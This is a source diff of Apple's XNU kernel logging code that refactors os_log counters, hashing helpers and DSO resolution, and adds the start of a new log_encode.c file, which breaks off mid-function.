index 276a91f5e0cef31b657c531ede8f061e62a845d5..933b0efa3d38989c9b4c61053409e45b74f9a4df 100644 (file)
@@ -243,8 +243,8 @@ _os_atomic_mo_has_release(OS_ATOMIC_STD memory_order ord)
 
 #define _os_atomic_clang_op(p, v, m, o, op) ({ \
        __auto_type _v = _os_atomic_value_cast(p, v); \
-       __auto_type _r = _os_atomic_clang_op_orig(p, _v, m, o); \
-       op(_r, _v); \
+       __auto_type _s = _os_atomic_clang_op_orig(p, _v, m, o); \
+       op(_s, _v); \
 })
 
 #if OS_ATOMIC_CONFIG_MEMORY_ORDER_DEPENDENCY
index 264146fb91e73573207eb31538082d1263aa0908..3e90258e8225e2d586c915239328bd6da5debab8 100644 (file)
 
 __BEGIN_DECLS
 
+static inline uint32_t
+os_hash_jenkins_update(const void *data, size_t length, uint32_t hash)
+{
+       const uint8_t *key = (const uint8_t *)data;
+
+       for (size_t i = 0; i < length; i++) {
+               hash += key[i];
+               hash += (hash << 10);
+               hash ^= (hash >> 6);
+       }
+
+       return hash;
+}
+
+static inline uint32_t
+os_hash_jenkins_finish(uint32_t hash)
+{
+       hash += (hash << 3);
+       hash ^= (hash >> 11);
+       hash += (hash << 15);
+
+       return hash;
+}
+
 /*!
  * @function os_hash_jenkins
  *
@@ -56,20 +80,7 @@ __BEGIN_DECLS
 static inline uint32_t
 os_hash_jenkins(const void *data, size_t length)
 {
-       const uint8_t *key = (const uint8_t *)data;
-       uint32_t hash = 0;
-
-       for (size_t i = 0; i < length; i++) {
-               hash += key[i];
-               hash += (hash << 10);
-               hash ^= (hash >> 6);
-       }
-
-       hash += (hash << 3);
-       hash ^= (hash >> 11);
-       hash += (hash << 15);
-
-       return hash;
+       return os_hash_jenkins_finish(os_hash_jenkins_update(data, length, 0));
 }
 
 /*!
index 0cd4a9deb0d69adfdb0527f168582ef3222fc88e..c3698156105b67ea487a5978257d49f83ee315f4 100644 (file)
@@ -37,6 +37,7 @@
 #include "trace_internal.h"
 
 #include "log_encode.h"
+#include "log_mem.h"
 
 struct os_log_s {
        int a;
@@ -44,6 +45,9 @@ struct os_log_s {
 
 struct os_log_s _os_log_default;
 struct os_log_s _os_log_replay;
+
+LOGMEM_STATIC_INIT(os_log_mem, 14, 9, 10);
+
 extern vm_offset_t kernel_firehose_addr;
 extern firehose_chunk_t firehose_boot_chunk;
 
@@ -65,24 +69,26 @@ extern int oslog_stream_open;
 extern void *OSKextKextForAddress(const void *);
 
 /* Counters for persistence mode */
-uint32_t oslog_p_total_msgcount = 0;
-uint32_t oslog_p_metadata_saved_msgcount = 0;
-uint32_t oslog_p_metadata_dropped_msgcount = 0;
-uint32_t oslog_p_error_count = 0;
-uint32_t oslog_p_saved_msgcount = 0;
-uint32_t oslog_p_dropped_msgcount = 0;
-uint32_t oslog_p_boot_dropped_msgcount = 0;
-uint32_t oslog_p_coprocessor_total_msgcount = 0;
-uint32_t oslog_p_coprocessor_dropped_msgcount = 0;
+SCALABLE_COUNTER_DEFINE(oslog_p_total_msgcount);
+SCALABLE_COUNTER_DEFINE(oslog_p_metadata_saved_msgcount);
+SCALABLE_COUNTER_DEFINE(oslog_p_metadata_dropped_msgcount);
+SCALABLE_COUNTER_DEFINE(oslog_p_error_count);
+SCALABLE_COUNTER_DEFINE(oslog_p_saved_msgcount);
+SCALABLE_COUNTER_DEFINE(oslog_p_dropped_msgcount);
+SCALABLE_COUNTER_DEFINE(oslog_p_boot_dropped_msgcount);
+SCALABLE_COUNTER_DEFINE(oslog_p_coprocessor_total_msgcount);
+SCALABLE_COUNTER_DEFINE(oslog_p_coprocessor_dropped_msgcount);
+SCALABLE_COUNTER_DEFINE(oslog_p_unresolved_kc_msgcount);
 
 /* Counters for streaming mode */
-uint32_t oslog_s_total_msgcount = 0;
-uint32_t oslog_s_error_count = 0;
-uint32_t oslog_s_metadata_msgcount = 0;
+SCALABLE_COUNTER_DEFINE(oslog_s_error_count);
+/* Protected by the stream lock */
+uint32_t oslog_s_total_msgcount;
+uint32_t oslog_s_metadata_msgcount;
 
 /* Counters for msgbuf logging */
-uint32_t oslog_msgbuf_msgcount = 0;
-uint32_t oslog_msgbuf_dropped_msgcount = 0;
+SCALABLE_COUNTER_DEFINE(oslog_msgbuf_msgcount)
+SCALABLE_COUNTER_DEFINE(oslog_msgbuf_dropped_msgcount)
 
 static bool oslog_boot_done = false;
 
@@ -112,36 +118,36 @@ static void
 _os_log_to_msgbuf_internal(const char *format, va_list args, bool safe, bool logging, bool addcr);
 
 static void
-_os_log_to_log_internal(os_log_t oslog, os_log_type_t type,
-    const char *format, va_list args, void *addr, void *dso, bool driverKit);
+_os_log_to_log_internal(os_log_type_t type, const char *format, va_list args, void *addr, void *dso, bool driverKit);
 
-
-static void
-_os_log_actual(os_log_t oslog, os_log_type_t type, const char *format, void
-    *dso, void *addr, os_log_buffer_context_t context, bool driverKit);
+static bool
+os_log_turned_off(void)
+{
+       return atm_get_diagnostic_config() & (ATM_TRACE_DISABLE | ATM_TRACE_OFF);
+}
 
 bool
 os_log_info_enabled(os_log_t log __unused)
 {
-       return true;
+       return !os_log_turned_off();
 }
 
 bool
 os_log_debug_enabled(os_log_t log __unused)
 {
-       return true;
+       return !os_log_turned_off();
 }
 
-os_log_t
-os_log_create(const char *subsystem __unused, const char *category __unused)
+static bool
+os_log_disabled(void)
 {
-       return &_os_log_default;
+       return atm_get_diagnostic_config() & ATM_TRACE_DISABLE;
 }
 
-bool
-_os_log_string_is_public(const char *str __unused)
+os_log_t
+os_log_create(const char *subsystem __unused, const char *category __unused)
 {
-       return true;
+       return &_os_log_default;
 }
 
 __attribute__((noinline, not_tail_called)) void
@@ -226,29 +232,20 @@ static void
 _os_log_with_args_internal(os_log_t oslog, os_log_type_t type,
     const char *format, va_list args, void *addr, void *dso, bool driverKit, bool addcr)
 {
-       uint32_t  logging_config = atm_get_diagnostic_config();
-       boolean_t safe;
-       boolean_t logging;
-
        if (format[0] == '\0') {
                return;
        }
 
        /* early boot can log to dmesg for later replay (27307943) */
-       safe = (startup_phase < STARTUP_SUB_EARLY_BOOT || oslog_is_safe());
-
-       if (logging_config & ATM_TRACE_DISABLE || logging_config & ATM_TRACE_OFF) {
-               logging = false;
-       } else {
-               logging = true;
-       }
+       bool safe = (startup_phase < STARTUP_SUB_EARLY_BOOT || oslog_is_safe());
+       bool logging = !os_log_turned_off();
 
        if (oslog != &_os_log_replay) {
                _os_log_to_msgbuf_internal(format, args, safe, logging, addcr);
        }
 
        if (safe && logging) {
-               _os_log_to_log_internal(oslog, type, format, args, addr, dso, driverKit);
+               _os_log_to_log_internal(type, format, args, addr, dso, driverKit);
        }
 }
 
@@ -268,7 +265,7 @@ _os_log_to_msgbuf_internal(const char *format, va_list args, bool safe, bool log
        va_list args_copy;
 
        if (!bsd_log_lock(safe)) {
-               os_atomic_inc(&oslog_msgbuf_dropped_msgcount, relaxed);
+               counter_inc(&oslog_msgbuf_dropped_msgcount);
                return;
        }
 
@@ -350,177 +347,101 @@ _os_log_to_msgbuf_internal(const char *format, va_list args, bool safe, bool log
 
        bsd_log_unlock();
        logwakeup(msgbufp);
-       os_atomic_inc(&oslog_msgbuf_msgcount, relaxed);
+       counter_inc(&oslog_msgbuf_msgcount);
 }
 
-static void
-_os_log_to_log_internal(os_log_t oslog, os_log_type_t type,
-    const char *format, va_list args, void *addr, void *dso, bool driverKit)
+static firehose_stream_t
+firehose_stream(os_log_type_t type)
 {
-       kc_format_t kcformat = KCFormatUnknown;
-       struct os_log_buffer_context_s context;
-       unsigned char buffer_data[OS_LOG_BUFFER_MAX_SIZE] __attribute__((aligned(8)));
-       os_log_buffer_t buffer = (os_log_buffer_t)buffer_data;
-       uint8_t pubdata[OS_LOG_BUFFER_MAX_SIZE];
-       va_list args_copy;
-
-       if (addr == NULL) {
-               return;
-       }
-
-       if (!PE_get_primary_kc_format(&kcformat)) {
-               return;
-       }
-
-       if (kcformat == KCFormatStatic || kcformat == KCFormatKCGEN) {
-               void *baseAddress = PE_get_kc_baseaddress(KCKindPrimary);
-               if (!baseAddress) {
-                       return;
-               }
-               dso = baseAddress;
-       } else if (kcformat == KCFormatDynamic || kcformat == KCFormatFileset) {
-               if (dso == NULL) {
-                       dso = (void *) OSKextKextForAddress(format);
-                       if (dso == NULL) {
-                               return;
-                       }
-               }
-               if (!_os_trace_addr_in_text_segment(dso, format)) {
-                       return;
-               }
-               if (!driverKit) {
-                       void *dso_addr = (void *) OSKextKextForAddress(addr);
-                       if (dso != dso_addr) {
-                               return;
-                       }
-               }
-       }
-
-       memset(&context, 0, sizeof(context));
-       memset(buffer, 0, OS_LOG_BUFFER_MAX_SIZE);
+       return (type == OS_LOG_TYPE_INFO || type == OS_LOG_TYPE_DEBUG) ?
+              firehose_stream_memory : firehose_stream_persist;
+}
 
-       context.shimmed = true;
-       context.buffer = buffer;
-       context.content_sz = OS_LOG_BUFFER_MAX_SIZE - sizeof(*buffer);
-       context.pubdata = pubdata;
-       context.pubdata_sz = sizeof(pubdata);
+static void
+_os_log_actual(os_log_type_t type, const char *format, void *dso, void *addr, uint8_t *logdata, size_t logdata_sz,
+    firehose_tracepoint_flags_t flags, bool driverKit)
+{
+       firehose_tracepoint_id_u trace_id;
 
-       va_copy(args_copy, args);
+       firehose_stream_t stream = firehose_stream(type);
+       uint64_t timestamp = firehose_tracepoint_time(firehose_activity_flags_default);
 
-       os_atomic_inc(&oslog_p_total_msgcount, relaxed);
-       if (_os_log_encode(format, args_copy, 0, &context)) {
-               _os_log_actual(oslog, type, format, dso, addr, &context, driverKit);
+       if (driverKit) {
+               // set FIREHOSE_TRACEPOINT_PC_DYNAMIC_BIT so logd will not try to find the format string in
+               // the executable text
+               trace_id.ftid_value = FIREHOSE_TRACE_ID_MAKE(firehose_tracepoint_namespace_log,
+                   type, flags, (uint32_t)((uintptr_t)addr | FIREHOSE_TRACEPOINT_PC_DYNAMIC_BIT));
        } else {
-               os_atomic_inc(&oslog_p_error_count, relaxed);
+               // create trace_id after we've set additional flags
+               trace_id.ftid_value = FIREHOSE_TRACE_ID_MAKE(firehose_tracepoint_namespace_log,
+                   type, flags, _os_trace_offset(dso, format, (_firehose_tracepoint_flags_activity_t)flags));
        }
 
-       va_end(args_copy);
+
+       _firehose_trace(stream, trace_id, timestamp, logdata, logdata_sz, true);
 }
 
-static inline size_t
-_os_trace_write_location_for_address(uint8_t buf[static sizeof(uint64_t)],
-    void *dso, const void *address, firehose_tracepoint_flags_t *flags, __unused bool driverKit)
+static void *
+resolve_dso(const char *fmt, void *dso, void *addr, bool driverKit)
 {
-       uintptr_t shift_addr = (uintptr_t)address - (uintptr_t)dso;
-
        kc_format_t kcformat = KCFormatUnknown;
-       __assert_only bool result = PE_get_primary_kc_format(&kcformat);
-       assert(result);
 
-       if (kcformat == KCFormatStatic || kcformat == KCFormatKCGEN) {
-               *flags = _firehose_tracepoint_flags_pc_style_shared_cache;
-               memcpy(buf, (uint32_t[]){ (uint32_t)shift_addr }, sizeof(uint32_t));
-               return sizeof(uint32_t);
-       } else {
-               kernel_mach_header_t *mh = dso;
-
-               /*
-                * driverKit will have the dso set as MH_EXECUTE
-                * (it is logging from a syscall in the kernel)
-                * but needs logd to parse the address as an
-                * absolute pc.
-                */
-               if (mh->filetype == MH_EXECUTE && !driverKit) {
-                       *flags = _firehose_tracepoint_flags_pc_style_main_exe;
-                       memcpy(buf, (uint32_t[]){ (uint32_t)shift_addr }, sizeof(uint32_t));
-                       return sizeof(uint32_t);
-               } else {
-                       *flags = _firehose_tracepoint_flags_pc_style_absolute;
-                       if (!driverKit) {
-                               shift_addr = VM_KERNEL_UNSLIDE(address);
-                       } else {
-                               shift_addr = (uintptr_t) address;
-                       }
-                       memcpy(buf, (uintptr_t[]){ shift_addr }, sizeof(uintptr_t));
-#if __LP64__
-                       return 6; // 48 bits are enough
-#else
-                       return sizeof(uintptr_t);
-#endif
-               }
+       if (!PE_get_primary_kc_format(&kcformat)) {
+               return NULL;
        }
-}
 
-
-OS_ALWAYS_INLINE
-static inline size_t
-_os_log_buffer_pack(uint8_t *buffdata, size_t buffdata_sz,
-    os_log_buffer_context_t ctx)
-{
-       os_log_buffer_t buffer = ctx->buffer;
-       size_t buffer_sz = sizeof(*ctx->buffer) + ctx->content_sz;
-       size_t total_sz  = buffer_sz + ctx->pubdata_sz;
-
-       if (total_sz > buffdata_sz) {
-               return 0;
+       switch (kcformat) {
+       case KCFormatStatic:
+       case KCFormatKCGEN:
+               dso = PE_get_kc_baseaddress(KCKindPrimary);
+               break;
+       case KCFormatDynamic:
+       case KCFormatFileset:
+               if (!dso && (dso = (void *)OSKextKextForAddress(fmt)) == NULL) {
+                       return NULL;
+               }
+               if (!_os_trace_addr_in_text_segment(dso, fmt)) {
+                       return NULL;
+               }
+               if (!driverKit && (dso != (void *)OSKextKextForAddress(addr))) {
+                       return NULL;
+               }
+               break;
+       default:
+               panic("unknown KC format type");
        }
 
-       memcpy(buffdata, buffer, buffer_sz);
-       memcpy(&buffdata[buffer_sz], ctx->pubdata, ctx->pubdata_sz);
-       return total_sz;
+       return dso;
 }
 
 static void
-_os_log_actual(os_log_t oslog __unused, os_log_type_t type, const char *format,
-    void *dso, void *addr, os_log_buffer_context_t context, bool driverKit)
+_os_log_to_log_internal(os_log_type_t type, const char *fmt, va_list args, void *addr, void *dso, bool driverKit)
 {
-       firehose_stream_t stream;
-       firehose_tracepoint_flags_t flags = 0;
-       firehose_tracepoint_id_u trace_id;
-       uint8_t buffdata[OS_LOG_BUFFER_MAX_SIZE];
-       size_t addr_len = 0, buffdata_sz;
-       uint64_t timestamp;
-       uint64_t thread_id;
-
-       // dso == the start of the binary that was loaded
-       addr_len = _os_trace_write_location_for_address(buffdata, dso, addr, &flags, driverKit);
-       buffdata_sz = _os_log_buffer_pack(buffdata + addr_len,
-           sizeof(buffdata) - addr_len, context);
-       if (buffdata_sz == 0) {
+       counter_inc(&oslog_p_total_msgcount);
+
+       if (addr == NULL) {
+               counter_inc(&oslog_p_unresolved_kc_msgcount);
                return;
        }
-       buffdata_sz += addr_len;
 
-       timestamp = firehose_tracepoint_time(firehose_activity_flags_default);
-       thread_id = thread_tid(current_thread());
-
-       if (driverKit) {
-               // set FIREHOSE_TRACEPOINT_PC_DYNAMIC_BIT so logd will not try to find the format string in
-               // the executable text
-               trace_id.ftid_value = FIREHOSE_TRACE_ID_MAKE(firehose_tracepoint_namespace_log,
-                   type, flags, (uint32_t)((uintptr_t)addr | FIREHOSE_TRACEPOINT_PC_DYNAMIC_BIT));
-       } else {
-               // create trace_id after we've set additional flags
-               trace_id.ftid_value = FIREHOSE_TRACE_ID_MAKE(firehose_tracepoint_namespace_log,
-                   type, flags, _os_trace_offset(dso, format, (_firehose_tracepoint_flags_activity_t)flags));
+       if ((dso = resolve_dso(fmt, dso, addr, driverKit)) == NULL) {
+               counter_inc(&oslog_p_unresolved_kc_msgcount);
+               return;
        }
 
-       if (type == OS_LOG_TYPE_INFO || type == OS_LOG_TYPE_DEBUG) {
-               stream = firehose_stream_memory;
+       uint8_t buffer[OS_LOG_BUFFER_MAX_SIZE] __attribute__((aligned(8))) = { 0 };
+       struct os_log_context_s ctx;
+
+       os_log_context_init(&ctx, &os_log_mem, buffer, sizeof(buffer));
+
+       if (os_log_context_encode(&ctx, fmt, args, addr, dso, driverKit)) {
+               _os_log_actual(type, fmt, dso, addr, ctx.ctx_buffer, ctx.ctx_content_sz,
+                   ctx.ctx_ft_flags, driverKit);
        } else {
-               stream = firehose_stream_persist;
+               counter_inc(&oslog_p_error_count);
        }
-       _firehose_trace(stream, trace_id, timestamp, buffdata, buffdata_sz, true);
+
+       os_log_context_free(&ctx);
 }
 
 bool
@@ -529,14 +450,18 @@ os_log_coprocessor(void *buff, uint64_t buff_len, os_log_type_t type,
 {
        firehose_tracepoint_id_u trace_id;
        firehose_tracepoint_id_t return_id = 0;
-       firehose_stream_t        stream;
        uint8_t                  pubdata[OS_LOG_BUFFER_MAX_SIZE];
        size_t                   wr_pos = 0;
 
+       if (os_log_turned_off()) {
+               return false;
+       }
+
        if (buff_len + 16 + sizeof(uint32_t) > OS_LOG_BUFFER_MAX_SIZE) {
                return false;
        }
 
+       firehose_stream_t stream = firehose_stream(type);
        // unlike kext, where pc is used to find uuid, in coprocessor logs the uuid is passed as part of the tracepoint
        firehose_tracepoint_flags_t flags = _firehose_tracepoint_flags_pc_style_uuid_relative;
 
@@ -551,20 +476,14 @@ os_log_coprocessor(void *buff, uint64_t buff_len, os_log_type_t type,
        trace_id.ftid_value = FIREHOSE_TRACE_ID_MAKE(firehose_tracepoint_namespace_log,
            type, flags, offset);
 
-       if (type == OS_LOG_TYPE_INFO || type == OS_LOG_TYPE_DEBUG) {
-               stream = firehose_stream_memory;
-       } else {
-               stream = firehose_stream_persist;
-       }
-
-       os_atomic_inc(&oslog_p_coprocessor_total_msgcount, relaxed);
+       counter_inc(&oslog_p_coprocessor_total_msgcount);
 
        // send firehose tracepoint containing os log to firehose buffer
        return_id = _firehose_trace(stream, trace_id, timestamp, pubdata,
            buff_len + wr_pos, stream_log);
 
        if (return_id == 0) {
-               os_atomic_inc(&oslog_p_coprocessor_dropped_msgcount, relaxed);
+               counter_inc(&oslog_p_coprocessor_dropped_msgcount);
                return false;
        }
        return true;
@@ -582,7 +501,7 @@ _firehose_trace(firehose_stream_t stream, firehose_tracepoint_id_u ftid,
 
        if (slowpath(ft_size + publen > _firehose_chunk_payload_size)) {
                // We'll need to have some handling here. For now - return 0
-               os_atomic_inc(&oslog_p_error_count, relaxed);
+               counter_inc(&oslog_p_error_count);
                return 0;
        }
 
@@ -604,11 +523,11 @@ out:
        if (!fastpath(ft)) {
                if (oslog_boot_done) {
                        if (stream == firehose_stream_metadata) {
-                               os_atomic_inc(&oslog_p_metadata_dropped_msgcount, relaxed);
+                               counter_inc(&oslog_p_metadata_dropped_msgcount);
                        } else {
                                // If we run out of space in the persistence buffer we're
                                // dropping the message.
-                               os_atomic_inc(&oslog_p_dropped_msgcount, relaxed);
+                               counter_inc(&oslog_p_dropped_msgcount);
                        }
                        return 0;
                }
@@ -619,7 +538,7 @@ out:
                offset = firehose_chunk_tracepoint_try_reserve(fbc, stamp,
                    firehose_stream_persist, 0, (uint16_t)publen, 0, NULL);
                if (offset <= 0) {
-                       os_atomic_inc(&oslog_p_boot_dropped_msgcount, relaxed);
+                       counter_inc(&oslog_p_boot_dropped_msgcount);
                        return 0;
                }
 
@@ -627,7 +546,7 @@ out:
                    thread_tid(current_thread()), offset);
                memcpy(ft->ft_data, pubdata, publen);
                firehose_chunk_tracepoint_end(fbc, ft, ftid);
-               os_atomic_inc(&oslog_p_saved_msgcount, relaxed);
+               counter_inc(&oslog_p_saved_msgcount);
                return ftid.ftid_value;
        }
        if (!oslog_boot_done) {
@@ -637,9 +556,9 @@ out:
 
        __firehose_buffer_tracepoint_flush(ft, ftid);
        if (stream == firehose_stream_metadata) {
-               os_atomic_inc(&oslog_p_metadata_saved_msgcount, relaxed);
+               counter_inc(&oslog_p_metadata_saved_msgcount);
        } else {
-               os_atomic_inc(&oslog_p_saved_msgcount, relaxed);
+               counter_inc(&oslog_p_saved_msgcount);
        }
        return ftid.ftid_value;
 }
@@ -686,6 +605,10 @@ os_log_coprocessor_register(const char *uuid, const char *file_path, bool copy)
                char path[PATH_MAX + sizeof(struct firehose_trace_uuid_info_s)];
        } buf;
 
+       if (os_log_disabled()) {
+               return;
+       }
+
        if (path_size > PATH_MAX) {
                return;
        }
@@ -716,6 +639,10 @@ firehose_trace_metadata(firehose_stream_t stream, firehose_tracepoint_id_u ftid,
 {
        oslog_stream_buf_entry_t m_entry = NULL;
 
+       if (os_log_disabled()) {
+               return;
+       }
+
        // If streaming mode is not on, only log  the metadata
        // in the persistence buffer
 
@@ -730,7 +657,7 @@ firehose_trace_metadata(firehose_stream_t stream, firehose_tracepoint_id_u ftid,
        m_entry = oslog_stream_create_buf_entry(oslog_stream_link_type_metadata, ftid,
            stamp, pubdata, publen);
        if (!m_entry) {
-               os_atomic_inc(&oslog_s_error_count, relaxed);
+               counter_inc(&oslog_s_error_count);
                goto finish;
        }
 
@@ -855,9 +782,9 @@ test_os_log()
        T_ASSERT_EQ_INT(TRUE, os_log_debug_enabled(log_handle), "os_log_debug is enabled");
        T_ASSERT_EQ_PTR(&_os_log_default, OS_LOG_DEFAULT, "ensure OS_LOG_DEFAULT is _os_log_default");
 
-       total_msg = oslog_p_total_msgcount;
-       saved_msg = oslog_p_saved_msgcount;
-       dropped_msg = oslog_p_dropped_msgcount;
+       total_msg = counter_load(&oslog_p_total_msgcount);
+       saved_msg = counter_load(&oslog_p_saved_msgcount);
+       dropped_msg = counter_load(&oslog_p_dropped_msgcount);
        T_LOG("oslog internal counters total %u , saved %u, dropped %u", total_msg, saved_msg, dropped_msg);
 
        T_LOG("Validating with uniqid %u u64 %llu", uniqid, a);
@@ -886,45 +813,45 @@ test_os_log()
        }
 
        /* for enabled logging printfs should be saved in oslog as well */
-       T_EXPECT_GE_UINT((oslog_p_total_msgcount - total_msg), 2, "atleast 2 msgs should be seen by oslog system");
+       T_EXPECT_GE_UINT((counter_load(&oslog_p_total_msgcount) - total_msg), 2, "atleast 2 msgs should be seen by oslog system");
 
        a = mach_absolute_time();
        total_seqno = 1;
        seqno = 1;
-       total_msg = oslog_p_total_msgcount;
-       saved_msg = oslog_p_saved_msgcount;
-       dropped_msg = oslog_p_dropped_msgcount;
+       total_msg = counter_load(&oslog_p_total_msgcount);
+       saved_msg = counter_load(&oslog_p_saved_msgcount);
+       dropped_msg = counter_load(&oslog_p_dropped_msgcount);
        datalen = scnprintf(databuffer, sizeof(databuffer), TESTOSLOGFMT("oslog_info"), uniqid, seqno, total_seqno);
        checksum = crc32(0, databuffer, datalen);
        os_log_info(log_handle, TESTOSLOG("oslog_info") "mat%llu", checksum, uniqid, seqno, total_seqno, a);
-       T_EXPECT_GE_UINT((oslog_p_total_msgcount - total_msg), 1, "total message count in buffer");
+       T_EXPECT_GE_UINT((counter_load(&oslog_p_total_msgcount) - total_msg), 1, "total message count in buffer");
 
        datalen = scnprintf(databuffer, sizeof(databuffer), "kernel^0^test^oslog_info#mat%llu", a);
        match_count = find_pattern_in_buffer(databuffer, datalen, total_seqno);
        T_EXPECT_EQ_ULONG(match_count, total_seqno, "verify oslog_info does not go to systemlog buffer");
 
-       total_msg = oslog_p_total_msgcount;
+       total_msg = counter_load(&oslog_p_total_msgcount);
        test_oslog_info_helper(uniqid, 10);
-       T_EXPECT_GE_UINT(oslog_p_total_msgcount - total_msg, 10, "test_oslog_info_helper: Should have seen 10 msgs");
+       T_EXPECT_GE_UINT(counter_load(&oslog_p_total_msgcount) - total_msg, 10, "test_oslog_info_helper: Should have seen 10 msgs");
 
-       total_msg = oslog_p_total_msgcount;
+       total_msg = counter_load(&oslog_p_total_msgcount);
        test_oslog_debug_helper(uniqid, 10);
-       T_EXPECT_GE_UINT(oslog_p_total_msgcount - total_msg, 10, "test_oslog_debug_helper:Should have seen 10 msgs");
+       T_EXPECT_GE_UINT(counter_load(&oslog_p_total_msgcount) - total_msg, 10, "test_oslog_debug_helper:Should have seen 10 msgs");
 
-       total_msg = oslog_p_total_msgcount;
+       total_msg = counter_load(&oslog_p_total_msgcount);
        test_oslog_error_helper(uniqid, 10);
-       T_EXPECT_GE_UINT(oslog_p_total_msgcount - total_msg, 10, "test_oslog_error_helper:Should have seen 10 msgs");
+       T_EXPECT_GE_UINT(counter_load(&oslog_p_total_msgcount) - total_msg, 10, "test_oslog_error_helper:Should have seen 10 msgs");
 
-       total_msg = oslog_p_total_msgcount;
+       total_msg = counter_load(&oslog_p_total_msgcount);
        test_oslog_default_helper(uniqid, 10);
-       T_EXPECT_GE_UINT(oslog_p_total_msgcount - total_msg, 10, "test_oslog_default_helper:Should have seen 10 msgs");
+       T_EXPECT_GE_UINT(counter_load(&oslog_p_total_msgcount) - total_msg, 10, "test_oslog_default_helper:Should have seen 10 msgs");
 
-       total_msg = oslog_p_total_msgcount;
+       total_msg = counter_load(&oslog_p_total_msgcount);
        test_oslog_fault_helper(uniqid, 10);
-       T_EXPECT_GE_UINT(oslog_p_total_msgcount - total_msg, 10, "test_oslog_fault_helper:Should have seen 10 msgs");
+       T_EXPECT_GE_UINT(counter_load(&oslog_p_total_msgcount) - total_msg, 10, "test_oslog_fault_helper:Should have seen 10 msgs");
 
-       T_LOG("oslog internal counters total %u , saved %u, dropped %u", oslog_p_total_msgcount, oslog_p_saved_msgcount,
-           oslog_p_dropped_msgcount);
+       T_LOG("oslog internal counters total %u , saved %u, dropped %u", counter_load(&oslog_p_total_msgcount), counter_load(&oslog_p_saved_msgcount),
+           counter_load(&oslog_p_dropped_msgcount));
 
        return KERN_SUCCESS;
 }
@@ -945,8 +872,8 @@ test_os_log_parallel(void)
        kern_return_t kr;
        uint32_t uniqid = RandomULong();
 
-       printf("oslog internal counters total %u , saved %u, dropped %u", oslog_p_total_msgcount, oslog_p_saved_msgcount,
-           oslog_p_dropped_msgcount);
+       printf("oslog internal counters total %lld , saved %lld, dropped %lld", counter_load(&oslog_p_total_msgcount), counter_load(&oslog_p_saved_msgcount),
+           counter_load(&oslog_p_dropped_msgcount));
 
        kr = kernel_thread_start(_test_log_loop, NULL, &thread[0]);
        T_ASSERT_EQ_INT(kr, KERN_SUCCESS, "kernel_thread_start returned successfully");
@@ -964,8 +891,8 @@ test_os_log_parallel(void)
        thread_deallocate(thread[0]);
        thread_deallocate(thread[1]);
 
-       T_LOG("oslog internal counters total %u , saved %u, dropped %u", oslog_p_total_msgcount, oslog_p_saved_msgcount,
-           oslog_p_dropped_msgcount);
+       T_LOG("oslog internal counters total %lld , saved %lld, dropped %lld", counter_load(&oslog_p_total_msgcount), counter_load(&oslog_p_saved_msgcount),
+           counter_load(&oslog_p_dropped_msgcount));
        T_PASS("parallel_logging tests is now complete");
 
        return KERN_SUCCESS;
@@ -981,9 +908,9 @@ test_oslog_handleOSLogCtl(int32_t * in, int32_t * out, int32_t len)
        case 1:
        {
                /* send out counters */
-               out[1] = oslog_p_total_msgcount;
-               out[2] = oslog_p_saved_msgcount;
-               out[3] = oslog_p_dropped_msgcount;
+               out[1] = counter_load(&oslog_p_total_msgcount);
+               out[2] = counter_load(&oslog_p_saved_msgcount);
+               out[3] = counter_load(&oslog_p_dropped_msgcount);
                out[0] = KERN_SUCCESS;
                break;
        }
@@ -1035,16 +962,16 @@ kern_return_t
 test_stresslog_dropmsg(uint32_t uniqid)
 {
        uint32_t total, saved, dropped;
-       total = oslog_p_total_msgcount;
-       saved = oslog_p_saved_msgcount;
-       dropped = oslog_p_dropped_msgcount;
+       total = counter_load(&oslog_p_total_msgcount);
+       saved = counter_load(&oslog_p_saved_msgcount);
+       dropped = counter_load(&oslog_p_dropped_msgcount);
        uniqid = RandomULong();
        test_oslog_debug_helper(uniqid, 100);
-       while ((oslog_p_dropped_msgcount - dropped) == 0) {
+       while ((counter_load(&oslog_p_dropped_msgcount) - dropped) == 0) {
                test_oslog_debug_helper(uniqid, 100);
        }
-       printf("test_stresslog_dropmsg: logged %u msgs, saved %u and caused a drop of %u msgs. \n", oslog_p_total_msgcount - total,
-           oslog_p_saved_msgcount - saved, oslog_p_dropped_msgcount - dropped);
+       printf("test_stresslog_dropmsg: logged %lld msgs, saved %lld and caused a drop of %lld msgs. \n", counter_load(&oslog_p_total_msgcount) - total,
+           counter_load(&oslog_p_saved_msgcount) - saved, counter_load(&oslog_p_dropped_msgcount) - dropped);
        return KERN_SUCCESS;
 }
 
diff --git a/libkern/os/log_encode.c b/libkern/os/log_encode.c
new file mode 100644 (file)
index 0000000..5c2e2e9
--- /dev/null
@@ -0,0 +1,603 @@
+/*
+ * Copyright (c) 2015-2020 Apple Inc. All rights reserved.
+ *
+ * @APPLE_LICENSE_HEADER_START@
+ *
+ * This file contains Original Code and/or Modifications of Original Code
+ * as defined in and that are subject to the Apple Public Source License
+ * Version 2.0 (the 'License'). You may not use this file except in
+ * compliance with the License. Please obtain a copy of the License at
+ * http://www.opensource.apple.com/apsl/ and read it before using this
+ * file.
+ *
+ * The Original Code and all software distributed under the License are
+ * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER
+ * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES,
+ * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY,
+ * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT.
+ * Please see the License for the specific language governing rights and
+ * limitations under the License.
+ *
+ * @APPLE_LICENSE_HEADER_END@
+ */
+
+#include <stdbool.h>
+#include <firehose/tracepoint_private.h>
+#include <kern/assert.h>
+#include <kern/counter.h>
+#include <kern/locks.h>
+#include <pexpert/pexpert.h>
+#include <sys/param.h>
+
+#if __has_feature(ptrauth_calls)
+#include <mach/vm_param.h>
+#include <ptrauth.h>
+#endif /* __has_feature(ptrauth_calls) */
+
+#include "log_encode.h"
+#include "log_mem.h"
+
+#define isdigit(ch) (((ch) >= '0') && ((ch) <= '9'))
+#define log_context_cursor(ctx) &(ctx)->ctx_hdr->hdr_data[(ctx)->ctx_content_off]
+
+extern boolean_t doprnt_hide_pointers;
+
+SCALABLE_COUNTER_DEFINE(oslog_p_fmt_invalid_msgcount);
+SCALABLE_COUNTER_DEFINE(oslog_p_fmt_max_args_msgcount);
+SCALABLE_COUNTER_DEFINE(oslog_p_truncated_msgcount);
+
+static bool
+is_kernel_pointer(void *arg, size_t arg_len)
+{
+       if (arg_len < sizeof(void *)) {
+               return false;
+       }
+
+       unsigned long long value = 0;
